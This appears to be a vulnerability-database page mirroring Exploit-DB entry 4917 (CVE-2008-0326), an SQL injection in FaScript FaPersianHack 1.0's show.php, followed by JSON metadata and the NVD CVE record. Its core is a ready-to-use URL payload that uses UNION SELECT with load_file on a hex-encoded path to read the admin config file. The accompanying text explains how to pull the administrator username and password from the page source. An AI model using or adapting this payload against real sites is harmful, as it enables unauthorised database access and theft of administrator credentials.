Search...

FaScript FaPersianHack 1.0 - show.php SQL Injection Vulnerability

2008-01-15T00:00:00

ID EDB-ID:4917
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-01-15T00:00:00

Description

FaScript FaPersianHack v1 (show.php) SQL Injection Vulnerability. CVE-2008-0326. Webapps exploit for php platform

                                        
                                            #####################################################################################
####           FaScript FaPersianHack v1 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://fascript.com/fapersianhack.zip                            #
#                                                                                   #
#Injection Adress :  http://Sitename/ph/show.php?id=&lt;SqL Code&gt;                      #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6/**/from/**/mysql.user/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-15]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:4917", "type": "exploitdb", "bulletinFamily": "exploit", "title": "FaScript FaPersianHack 1.0 - show.php SQL Injection Vulnerability", "description": "FaScript FaPersianHack v1 (show.php) SQL Injection Vulnerability. CVE-2008-0326. Webapps exploit for php platform", "published": "2008-01-15T00:00:00", "modified": "2008-01-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4917/", "reporter": "Khashayar Fereidani", "references": [], "cvelist": ["CVE-2008-0326"], "lastseen": "2016-01-31T21:05:16", "viewCount": 6, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-01-31T21:05:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0326"]}], "modified": "2016-01-31T21:05:16", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/4917/", "sourceData": "#####################################################################################\r\n#### FaScript FaPersianHack v1 Remote Sql Injection ####\r\n#### BY IRCRASH ####\r\n#####################################################################################\r\n# #\r\n#AUTHOR : IRCRASH (Dr.Crash) #\r\n# #\r\n#Script Download : http://fascript.com/fapersianhack.zip #\r\n# #\r\n#Injection Adress : http://Sitename/ph/show.php?id=<SqL Code> #\r\n# #\r\n#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php #\r\n# You can open this file with load_file Function in mysql and see admin #\r\n# Username and password in Page Source #\r\n# #\r\n# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 #\r\n# #\r\n#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6/**/from/**/mysql.user/*\r\n# #\r\n# Our site : HTTP://IRCRASH.COM #\r\n# #\r\n#####################################################################################\r\n\r\n# milw0rm.com [2008-01-15]\r\n", "osvdbidlist": ["40360"]}

{"cve": [{"lastseen": "2020-10-03T11:50:56", "description": "SQL injection vulnerability in class/show.php in FaScript FaPersianHack 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter to show.php.", "edition": 3, "cvss3": {}, "published": "2008-01-17T22:00:00", "title": "CVE-2008-0326", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0326"], "modified": "2017-09-29T01:30:00", "cpe": ["cpe:/a:fascript:fapersianhack:1.0"], "id": "CVE-2008-0326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0326", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fascript:fapersianhack:1.0:*:*:*:*:*:*:*"]}]}